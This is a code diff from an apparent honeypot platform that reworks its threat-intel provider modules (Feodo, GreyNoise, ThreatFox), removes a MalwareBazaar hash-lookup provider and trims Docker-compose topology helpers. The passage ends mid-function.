@@ -37,40 +37,6 @@ def _provider_list() -> list[str]:
|
||||
return [p.strip().lower() for p in raw.split(",") if p.strip()]
|
||||
|
||||
|
||||
_mal_hash_singleton: MalHashProvider | None = None
|
||||
_mal_hash_initialized: bool = False
|
||||
|
||||
|
||||
def get_mal_hash_provider() -> MalHashProvider | None:
|
||||
"""Return the configured malware-hash lookup provider singleton.
|
||||
|
||||
Sibling factory to :func:`get_intel_providers` — different keyspace
|
||||
(file SHA-256 vs IP), different consumer (the email ingester at
|
||||
observation time, not the IP-keyed intel-worker fan-out). Returns
|
||||
``None`` only if intel is disabled wholesale; otherwise returns a
|
||||
provider whose :meth:`is_known_bad` self-disables to a no-op when
|
||||
``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
|
||||
has to special-case "no provider configured."
|
||||
"""
|
||||
global _mal_hash_singleton, _mal_hash_initialized
|
||||
if _mal_hash_initialized:
|
||||
return _mal_hash_singleton
|
||||
_mal_hash_initialized = True
|
||||
if not _enabled():
|
||||
_mal_hash_singleton = None
|
||||
return None
|
||||
from decnet.intel.mal_hash import MalwareBazaarProvider
|
||||
_mal_hash_singleton = MalwareBazaarProvider()
|
||||
return _mal_hash_singleton
|
||||
|
||||
|
||||
def _reset_mal_hash_provider_for_testing() -> None:
|
||||
"""Test hook — drop the singleton so the next call re-reads env."""
|
||||
global _mal_hash_singleton, _mal_hash_initialized
|
||||
_mal_hash_singleton = None
|
||||
_mal_hash_initialized = False
|
||||
|
||||
|
||||
def get_intel_providers() -> List[IntelProvider]:
|
||||
"""Return the configured threat-intel providers.
|
||||
|
||||
|
||||
@@ -13,6 +13,7 @@ of attacker IPs map to a single network round-trip per refresh window.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import time
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
@@ -92,22 +93,16 @@ class FeodoProvider(IntelProvider):
|
||||
verdict=None, # absence ≠ "benign", let other providers speak
|
||||
column_updates={
|
||||
"feodo_listed": False,
|
||||
"feodo_malware_family": None,
|
||||
"feodo_raw": {},
|
||||
"feodo_raw": "{}",
|
||||
"feodo_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
family_obj = entry.get("malware")
|
||||
family = (
|
||||
family_obj if isinstance(family_obj, str) and family_obj else None
|
||||
)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict="malicious",
|
||||
column_updates={
|
||||
"feodo_listed": True,
|
||||
"feodo_malware_family": family,
|
||||
"feodo_raw": entry,
|
||||
"feodo_raw": json.dumps(entry),
|
||||
"feodo_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -25,6 +25,7 @@ Status code semantics:
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
@@ -70,9 +71,7 @@ class GreyNoiseProvider(IntelProvider):
|
||||
verdict="unknown",
|
||||
column_updates={
|
||||
"greynoise_classification": "unknown",
|
||||
"greynoise_name": None,
|
||||
"greynoise_tags": [],
|
||||
"greynoise_raw": {"message": "not seen"},
|
||||
"greynoise_raw": json.dumps({"message": "not seen"}),
|
||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
@@ -89,25 +88,12 @@ class GreyNoiseProvider(IntelProvider):
|
||||
|
||||
classification = (data.get("classification") or "unknown").lower()
|
||||
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
|
||||
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
|
||||
# "Censys") but no behavioral tag list — the tag taxonomy is
|
||||
# paid-tier only. Persist whatever we got; a future non-Community
|
||||
# provider may populate ``greynoise_tags``.
|
||||
name_obj = data.get("name")
|
||||
name = name_obj if isinstance(name_obj, str) and name_obj else None
|
||||
tags_obj = data.get("tags")
|
||||
tags: list[str] = (
|
||||
[t for t in tags_obj if isinstance(t, str)]
|
||||
if isinstance(tags_obj, list) else []
|
||||
)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict=verdict,
|
||||
column_updates={
|
||||
"greynoise_classification": classification,
|
||||
"greynoise_name": name,
|
||||
"greynoise_tags": tags,
|
||||
"greynoise_raw": data,
|
||||
"greynoise_raw": json.dumps(data),
|
||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -1,195 +0,0 @@
|
||||
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
|
||||
|
||||
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
|
||||
shape, but operates on the SHA-256 keyspace instead of IPs and so
|
||||
implements :class:`decnet.intel.base.MalHashProvider` rather than
|
||||
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
|
||||
|
||||
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
|
||||
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
|
||||
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
|
||||
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
|
||||
|
||||
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
|
||||
the provider logs one warning at first refresh attempt and disables
|
||||
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
|
||||
without ever making a network call. The ingester treats that the same
|
||||
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
|
||||
bus payload (which is exactly what the predicate's ``is True`` check
|
||||
does today, so the silent-no-op is behaviorally identical to "lane not
|
||||
shipped yet").
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import csv
|
||||
import io
|
||||
import os
|
||||
import time
|
||||
import zipfile
|
||||
from typing import Optional
|
||||
|
||||
from decnet.intel.base import MalHashProvider
|
||||
from decnet.logging import get_logger
|
||||
from decnet.net.http import stealth_client
|
||||
|
||||
log = get_logger("intel.mal_hash")
|
||||
|
||||
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
|
||||
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
|
||||
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
|
||||
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
|
||||
|
||||
|
||||
def _read_refresh_interval() -> float:
|
||||
raw = os.environ.get(_REFRESH_INTERVAL_ENV)
|
||||
if raw is None:
|
||||
return _DEFAULT_REFRESH_S
|
||||
try:
|
||||
return float(raw)
|
||||
except ValueError:
|
||||
log.warning(
|
||||
"%s=%r not a float; falling back to default %.0f",
|
||||
_REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
|
||||
)
|
||||
return _DEFAULT_REFRESH_S
|
||||
|
||||
|
||||
class MalwareBazaarProvider(MalHashProvider):
|
||||
"""Bulk SHA-256 lookup against MalwareBazaar's full export."""
|
||||
|
||||
name = "malwarebazaar"
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
*,
|
||||
auth_key: Optional[str] = None,
|
||||
refresh_interval_s: Optional[float] = None,
|
||||
) -> None:
|
||||
self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
|
||||
self._refresh_interval_s = (
|
||||
refresh_interval_s
|
||||
if refresh_interval_s is not None
|
||||
else _read_refresh_interval()
|
||||
)
|
||||
self._known: set[str] = set()
|
||||
self._loaded_at: float = 0.0
|
||||
self._last_error: Optional[str] = None
|
||||
self._disabled_warned: bool = False
|
||||
|
||||
@property
|
||||
def disabled(self) -> bool:
|
||||
return self._auth_key is None
|
||||
|
||||
async def _refresh(self) -> Optional[str]:
|
||||
"""Refetch the bulk feed. Returns an error string or ``None``."""
|
||||
if self._auth_key is None:
|
||||
return "no auth key"
|
||||
try:
|
||||
async with stealth_client(timeout=60.0) as client:
|
||||
resp = await client.get(
|
||||
_ENDPOINT, headers={"Auth-Key": self._auth_key},
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
return f"network: {exc}"
|
||||
if resp.status_code != 200:
|
||||
return f"HTTP {resp.status_code}"
|
||||
body = resp.content
|
||||
try:
|
||||
new_known = _parse_dump(body)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
return f"parse: {exc}"
|
||||
if not new_known:
|
||||
return "feed: empty"
|
||||
self._known = new_known
|
||||
self._loaded_at = time.monotonic()
|
||||
self._last_error = None
|
||||
log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
|
||||
return None
|
||||
|
||||
async def _ensure_fresh(self) -> None:
|
||||
if self.disabled:
|
||||
if not self._disabled_warned:
|
||||
log.warning(
|
||||
"R0046 mal_hash_match disabled: %s unset",
|
||||
_AUTH_KEY_ENV,
|
||||
)
|
||||
self._disabled_warned = True
|
||||
return
|
||||
if (
|
||||
not self._known
|
||||
or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
|
||||
):
|
||||
err = await self._refresh()
|
||||
if err:
|
||||
self._last_error = err
|
||||
log.warning("malwarebazaar refresh failed: %s", err)
|
||||
|
||||
async def is_known_bad(self, sha256: str) -> bool:
|
||||
if self.disabled:
|
||||
return False
|
||||
try:
|
||||
await self._ensure_fresh()
|
||||
except Exception as exc: # noqa: BLE001
|
||||
# Belt and braces: _ensure_fresh swallows refresh failures
|
||||
# but a bug in there shouldn't blow up the ingester payload.
|
||||
log.exception("malwarebazaar refresh raised: %s", exc)
|
||||
return False
|
||||
return sha256.lower() in self._known
|
||||
|
||||
|
||||
def _parse_dump(body: bytes) -> set[str]:
|
||||
"""Extract SHA-256 hashes from MalwareBazaar's full dump.
|
||||
|
||||
The endpoint returns a ZIP archive containing a single CSV with a
|
||||
``sha256_hash`` column. Some abuse.ch flavours of the same feed
|
||||
family ship plain CSV instead — handle both by sniffing the magic
|
||||
bytes. Hashes are lowercased; non-hex / wrong-length values are
|
||||
dropped (defense in depth — we set-membership-test by exact match).
|
||||
"""
|
||||
if body[:2] == b"PK":
|
||||
with zipfile.ZipFile(io.BytesIO(body)) as zf:
|
||||
csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
|
||||
if not csv_names:
|
||||
raise ValueError("zip has no .csv member")
|
||||
with zf.open(csv_names[0]) as fh:
|
||||
csv_bytes = fh.read()
|
||||
else:
|
||||
csv_bytes = body
|
||||
text = csv_bytes.decode("utf-8", errors="replace")
|
||||
return _extract_hashes(text)
|
||||
|
||||
|
||||
def _extract_hashes(text: str) -> set[str]:
|
||||
"""Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
|
||||
|
||||
The dump prefaces the table with ``#``-prefixed comment lines.
|
||||
Skip those, find the header row, locate the column, then read the
|
||||
rest. csv.reader handles the quoting (the ``signature`` column
|
||||
contains commas and is properly quoted in the dump).
|
||||
"""
|
||||
body_lines = [
|
||||
line for line in text.splitlines()
|
||||
if line and not line.lstrip().startswith("#")
|
||||
]
|
||||
if not body_lines:
|
||||
return set()
|
||||
reader = csv.reader(body_lines)
|
||||
header = next(reader, None)
|
||||
if not header:
|
||||
return set()
|
||||
norm = [h.strip().strip('"').lower() for h in header]
|
||||
try:
|
||||
col = norm.index("sha256_hash")
|
||||
except ValueError:
|
||||
# Fallback — first column is sha256 in every documented
|
||||
# variant; if the header naming changes upstream we still
|
||||
# capture something rather than silently emptying the set.
|
||||
col = 0
|
||||
out: set[str] = set()
|
||||
for row in reader:
|
||||
if len(row) <= col:
|
||||
continue
|
||||
cell = row[col].strip().strip('"').lower()
|
||||
if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
|
||||
out.add(cell)
|
||||
return out
|
||||
@@ -12,6 +12,7 @@ caps requests/min — the provider works either way.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
@@ -70,10 +71,7 @@ class ThreatFoxProvider(IntelProvider):
|
||||
verdict=None, # absence is not a benign signal
|
||||
column_updates={
|
||||
"threatfox_listed": False,
|
||||
"threatfox_threat_types": [],
|
||||
"threatfox_ioc_types": [],
|
||||
"threatfox_malware_families": [],
|
||||
"threatfox_raw": {},
|
||||
"threatfox_raw": "{}",
|
||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
@@ -85,37 +83,12 @@ class ThreatFoxProvider(IntelProvider):
|
||||
|
||||
data = payload.get("data") or []
|
||||
listed = bool(data)
|
||||
# Each match in ``data`` carries threat_type / ioc_type / malware
|
||||
# (canonical family). The IntelLifter dispatches ATT&CK techniques
|
||||
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
|
||||
# cc_skimming); the other two columns are evidence and SIEM
|
||||
# context. Sets are flattened across matches and serialised
|
||||
# sorted for determinism.
|
||||
threat_types: set[str] = set()
|
||||
ioc_types: set[str] = set()
|
||||
families: set[str] = set()
|
||||
if isinstance(data, list):
|
||||
for entry in data:
|
||||
if not isinstance(entry, dict):
|
||||
continue
|
||||
tt = entry.get("threat_type")
|
||||
if isinstance(tt, str) and tt:
|
||||
threat_types.add(tt)
|
||||
it = entry.get("ioc_type")
|
||||
if isinstance(it, str) and it:
|
||||
ioc_types.add(it)
|
||||
family = entry.get("malware") or entry.get("malware_printable")
|
||||
if isinstance(family, str) and family:
|
||||
families.add(family)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict="malicious" if listed else None,
|
||||
column_updates={
|
||||
"threatfox_listed": listed,
|
||||
"threatfox_threat_types": sorted(threat_types),
|
||||
"threatfox_ioc_types": sorted(ioc_types),
|
||||
"threatfox_malware_families": sorted(families),
|
||||
"threatfox_raw": data,
|
||||
"threatfox_raw": json.dumps(data),
|
||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -59,38 +59,6 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
|
||||
return None
|
||||
|
||||
|
||||
def _build_intel_event_payload(
|
||||
attacker_uuid: str,
|
||||
ip: str,
|
||||
row: dict[str, Any],
|
||||
providers: list[IntelProvider],
|
||||
) -> dict[str, Any]:
|
||||
"""Project the AttackerIntel row into the bus event the TTP worker
|
||||
consumes as ``source_kind="intel"``.
|
||||
"""
|
||||
return {
|
||||
"attacker_uuid": attacker_uuid,
|
||||
"attacker_ip": ip,
|
||||
"aggregate_verdict": row.get("aggregate_verdict"),
|
||||
"providers": [p.name for p in providers],
|
||||
# AbuseIPDB
|
||||
"abuseipdb_score": row.get("abuseipdb_score"),
|
||||
"abuseipdb_categories": row.get("abuseipdb_categories") or [],
|
||||
# GreyNoise
|
||||
"greynoise_classification": row.get("greynoise_classification"),
|
||||
"greynoise_name": row.get("greynoise_name"),
|
||||
"greynoise_tags": row.get("greynoise_tags") or [],
|
||||
# Feodo
|
||||
"feodo_listed": row.get("feodo_listed"),
|
||||
"feodo_malware_family": row.get("feodo_malware_family"),
|
||||
# ThreatFox
|
||||
"threatfox_listed": row.get("threatfox_listed"),
|
||||
"threatfox_threat_types": row.get("threatfox_threat_types") or [],
|
||||
"threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
|
||||
"threatfox_malware_families": row.get("threatfox_malware_families") or [],
|
||||
}
|
||||
|
||||
|
||||
async def _enrich_one(
|
||||
attacker_uuid: str,
|
||||
ip: str,
|
||||
@@ -204,9 +172,12 @@ async def run_intel_loop(
|
||||
await publish_safely(
|
||||
bus,
|
||||
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
|
||||
_build_intel_event_payload(
|
||||
attacker_uuid, ip, row, providers,
|
||||
),
|
||||
{
|
||||
"attacker_uuid": attacker_uuid,
|
||||
"attacker_ip": ip,
|
||||
"aggregate_verdict": row.get("aggregate_verdict"),
|
||||
"providers": [p.name for p in providers],
|
||||
},
|
||||
event_type=_topics.ATTACKER_INTEL_ENRICHED,
|
||||
)
|
||||
except Exception: # noqa: BLE001
|
||||
@@ -229,11 +200,11 @@ async def run_intel_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
|
||||
self.component = component
|
||||
|
||||
def filter(self, record: logging.LogRecord) -> bool:
|
||||
record.decnet_component = self.component
|
||||
record.decnet_component = self.component # type: ignore[attr-defined]
|
||||
return True
|
||||
|
||||
|
||||
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
|
||||
span = trace.get_current_span()
|
||||
ctx = span.get_span_context()
|
||||
if ctx and ctx.trace_id:
|
||||
record.otel_trace_id = format(ctx.trace_id, "032x")
|
||||
record.otel_span_id = format(ctx.span_id, "016x")
|
||||
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
|
||||
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
|
||||
else:
|
||||
record.otel_trace_id = "0"
|
||||
record.otel_span_id = "0"
|
||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
||||
except Exception:
|
||||
record.otel_trace_id = "0"
|
||||
record.otel_span_id = "0"
|
||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
||||
return True
|
||||
|
||||
|
||||
|
||||
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
|
||||
services: list[str] = PydanticField(..., min_length=1)
|
||||
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
|
||||
base_image: str # Docker image for the base/IP-holder container
|
||||
build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
|
||||
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
|
||||
hostname: str
|
||||
archetype: str | None = None # archetype slug if spawned from an archetype profile
|
||||
service_config: dict[str, dict] = PydanticField(default_factory=dict)
|
||||
|
||||
@@ -101,10 +101,7 @@ async def mutate_decky(
|
||||
|
||||
try:
|
||||
# Wrap blocking call in thread
|
||||
cp = compose_path
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
|
||||
)
|
||||
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
|
||||
except Exception as e:
|
||||
log.error("mutation failed decky=%s error=%s", decky_name, e)
|
||||
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
|
||||
@@ -164,8 +161,6 @@ async def mutate_all(
|
||||
if force or only is not None:
|
||||
due = True
|
||||
else:
|
||||
if interval_mins is None:
|
||||
continue
|
||||
elapsed_secs = now - decky.last_mutated
|
||||
due = elapsed_secs >= (interval_mins * 60)
|
||||
remaining = (interval_mins * 60) - elapsed_secs
|
||||
@@ -289,13 +284,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
|
||||
return 0
|
||||
drained = 0
|
||||
for topo in pending:
|
||||
tid = topo.id
|
||||
tid = topo["id"]
|
||||
try:
|
||||
await _deployer.resync_agent_topology(repo, tid)
|
||||
await repo.set_topology_resync(tid, False)
|
||||
drained += 1
|
||||
log.info("topology %s resynced to agent %s",
|
||||
tid, topo.target_host_uuid)
|
||||
tid, topo.get("target_host_uuid"))
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"topology %s resync failed (will retry): %s", tid, exc,
|
||||
@@ -410,11 +405,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -98,463 +98,6 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
|
||||
)
|
||||
|
||||
|
||||
async def _materialise_lan_change(
|
||||
repo: Any,
|
||||
topology_id: str,
|
||||
*,
|
||||
created: Optional[tuple[str, str, bool]] = None,
|
||||
removed: Optional[str] = None,
|
||||
) -> None:
|
||||
"""Create or remove the docker bridge for a live LAN op + re-render compose.
|
||||
|
||||
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
|
||||
write lands. Skips when:
|
||||
|
||||
* the topology is not active/degraded (a pending topology gets its
|
||||
networks created at deploy time),
|
||||
* the topology is pinned to a swarm agent (cross-host materialisation
|
||||
isn't implemented; the agent's apply_topology RPC re-renders the
|
||||
whole compose at next push),
|
||||
* the docker SDK / networking primitive raises (logged, not
|
||||
re-raised — the DB row is the source of truth).
|
||||
"""
|
||||
topology = await repo.get_topology(topology_id)
|
||||
if topology is None:
|
||||
return
|
||||
status = topology.status
|
||||
if status not in ("active", "degraded"):
|
||||
return
|
||||
if topology.target_host_uuid:
|
||||
_log.info(
|
||||
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
|
||||
topology_id,
|
||||
)
|
||||
return
|
||||
|
||||
# Lazy imports — these pull in docker.py / network.py which both
|
||||
# require the docker SDK; keeping them out of module-import keeps
|
||||
# the mutator usable in test environments that stub docker.
|
||||
import docker
|
||||
from decnet.engine.deployer import _topology_compose_path
|
||||
from decnet.network import create_bridge_network, remove_bridge_network
|
||||
from decnet.topology.compose import _network_name, write_topology_compose
|
||||
|
||||
client = docker.from_env()
|
||||
try:
|
||||
if created is not None:
|
||||
name, subnet, is_dmz = created
|
||||
net_name = _network_name(topology_id, name)
|
||||
try:
|
||||
create_bridge_network(
|
||||
client, net_name, subnet, internal=not is_dmz,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.error(
|
||||
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
|
||||
topology_id, name, subnet, exc,
|
||||
)
|
||||
# Don't re-raise — the DB row is the source of truth.
|
||||
# Operator can retry by removing + re-adding the LAN.
|
||||
if removed is not None:
|
||||
net_name = _network_name(topology_id, removed)
|
||||
try:
|
||||
remove_bridge_network(client, net_name)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
|
||||
topology_id, removed, exc,
|
||||
)
|
||||
|
||||
# Re-render compose so the file on disk matches the DB. Even
|
||||
# when the bridge create above failed, a future redeploy will
|
||||
# try to bring the network back from the compose definition.
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is not None:
|
||||
try:
|
||||
write_topology_compose(
|
||||
hydrated, _topology_compose_path(topology_id),
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live LAN op: compose re-render failed topology=%s: %s",
|
||||
topology_id, exc,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
|
||||
_log.error(
|
||||
"live LAN materialisation crashed topology=%s: %s",
|
||||
topology_id, exc,
|
||||
)
|
||||
|
||||
|
||||
def _is_buildx_wedge(exc: BaseException) -> bool:
|
||||
"""True when *exc* looks like the buildx EROFS wedge.
|
||||
|
||||
We consult both the structured CalledProcessError.stderr and the
|
||||
str(exc) form because ``_compose_with_retry`` raises a synthetic
|
||||
CalledProcessError whose ``stderr`` contains the recovery hint
|
||||
(which preserves the wedge signatures verbatim).
|
||||
"""
|
||||
from decnet.engine.deployer import (
|
||||
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
|
||||
)
|
||||
stderr = ""
|
||||
if hasattr(exc, "stderr") and exc.stderr:
|
||||
stderr = str(exc.stderr)
|
||||
haystack = (stderr + " " + str(exc)).lower()
|
||||
return (
|
||||
_BUILDX_WEDGE_SIGNATURE in haystack
|
||||
and _BUILDX_EROFS_SIGNATURE in haystack
|
||||
)
|
||||
|
||||
|
||||
async def _compose_up_with_buildkit_fallback(
|
||||
*args: str, compose_file, label: str,
|
||||
) -> None:
|
||||
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
|
||||
|
||||
The buildx activity dir occasionally lands on a read-only mount —
|
||||
happens enough on operator dev boxes that we don't want a single
|
||||
wedge to abort a live decky-add. When _compose_with_retry raises
|
||||
with the EROFS-wedge signatures, we retry once with
|
||||
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
|
||||
use the activity dir and isn't affected.
|
||||
|
||||
*label* is a human-readable identifier used only in log lines so an
|
||||
operator can grep the fall-back back to the originating op.
|
||||
"""
|
||||
import anyio
|
||||
from decnet.engine.deployer import _compose_with_retry
|
||||
try:
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose_with_retry(*args, compose_file=compose_file),
|
||||
)
|
||||
return
|
||||
except Exception as exc: # noqa: BLE001
|
||||
if not _is_buildx_wedge(exc):
|
||||
raise
|
||||
_log.warning(
|
||||
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
|
||||
"(legacy builder). Recover the buildx state at your leisure: "
|
||||
"rm -rf ~/.docker/buildx/activity && "
|
||||
"docker buildx create --name decnet-builder --use --bootstrap",
|
||||
label,
|
||||
)
|
||||
# Outside the except so the second attempt's traceback isn't
|
||||
# nested under the first failure if it also blows up.
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose_with_retry(
|
||||
*args, compose_file=compose_file,
|
||||
env={"DOCKER_BUILDKIT": "0"},
|
||||
),
|
||||
)
|
||||
|
||||
|
||||
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
|
||||
"""Compose service names for one decky: base + each per-decky service.
|
||||
|
||||
Skips ``fleet_singleton`` services — those run once fleet-wide and
|
||||
don't have a per-decky compose entry. Mirrors the same filter
|
||||
applied at compose-render time
|
||||
(:mod:`decnet.topology.compose.generate_topology_compose`).
|
||||
"""
|
||||
from decnet.services.registry import get_service
|
||||
targets = [decky_name]
|
||||
for svc_name in services:
|
||||
try:
|
||||
svc = get_service(svc_name)
|
||||
except KeyError:
|
||||
# Unknown service — leave it; the compose render won't emit
|
||||
# a fragment for it, so compose up will simply ignore the
|
||||
# name with a clear "no such service" error. Surface that
|
||||
# rather than silently dropping it.
|
||||
targets.append(f"{decky_name}-{svc_name}")
|
||||
continue
|
||||
if svc.fleet_singleton:
|
||||
continue
|
||||
targets.append(f"{decky_name}-{svc_name}")
|
||||
return targets
|
||||
|
||||
|
||||
async def _live_topology_or_none(
|
||||
repo: Any, topology_id: str,
|
||||
) -> Optional[dict[str, Any]]:
|
||||
"""Return the topology row only when it's eligible for live materialisation.
|
||||
|
||||
Returns None (so callers can skip with a single ``if`` check) when:
|
||||
|
||||
* the topology doesn't exist;
|
||||
* status is not ``active`` or ``degraded`` (pending topologies get
|
||||
everything materialised at deploy time);
|
||||
* the topology is pinned to a swarm agent (cross-host live editing
|
||||
is its own routing workstream).
|
||||
"""
|
||||
topology = await repo.get_topology(topology_id)
|
||||
if topology is None:
|
||||
return None
|
||||
if topology.status not in ("active", "degraded"):
|
||||
return None
|
||||
if topology.target_host_uuid:
|
||||
_log.info(
|
||||
"live decky op skipped (agent-pinned topology=%s); "
|
||||
"next agent push will reconcile",
|
||||
topology_id,
|
||||
)
|
||||
return None
|
||||
return topology
|
||||
|
||||
|
||||
async def _rerender_compose(repo: Any, topology_id: str) -> None:
|
||||
"""Re-render the per-topology compose file from the current DB.
|
||||
|
||||
Called after each materialisation step so the file on disk matches
|
||||
the topology rows. Soft-fails: a render error is logged but
|
||||
doesn't poison the DB-side mutation.
|
||||
"""
|
||||
from decnet.engine.deployer import _topology_compose_path
|
||||
from decnet.topology.compose import write_topology_compose
|
||||
hydrated = await hydrate(repo, topology_id)
|
||||
if hydrated is None:
|
||||
return
|
||||
try:
|
||||
write_topology_compose(hydrated, _topology_compose_path(topology_id))
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live op: compose re-render failed topology=%s: %s",
|
||||
topology_id, exc,
|
||||
)
|
||||
|
||||
|
||||
async def _materialise_decky_spawn(
|
||||
repo: Any, topology_id: str, decky_name: str, services: list[str],
|
||||
) -> bool:
|
||||
"""compose up -d --no-deps --build for one decky (base + services).
|
||||
|
||||
Re-renders compose first so the file lists the new decky. Returns
|
||||
True when compose-up reported success, False otherwise (or when
|
||||
the topology isn't eligible for live materialisation — pending
|
||||
topologies skip and return False so the caller doesn't flip the
|
||||
state to ``running`` based on a no-op). Best-effort: docker
|
||||
failure is logged, not re-raised — DB row is the source of truth.
|
||||
"""
|
||||
if await _live_topology_or_none(repo, topology_id) is None:
|
||||
return False
|
||||
from decnet.engine.deployer import _topology_compose_path
|
||||
await _rerender_compose(repo, topology_id)
|
||||
targets = _decky_targets(decky_name, services)
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
try:
|
||||
await _compose_up_with_buildkit_fallback(
|
||||
"up", "-d", "--no-deps", "--build", *targets,
|
||||
compose_file=compose_path,
|
||||
label=f"live add_decky topology={topology_id} decky={decky_name}",
|
||||
)
|
||||
return True
|
||||
except Exception as exc: # noqa: BLE001
|
||||
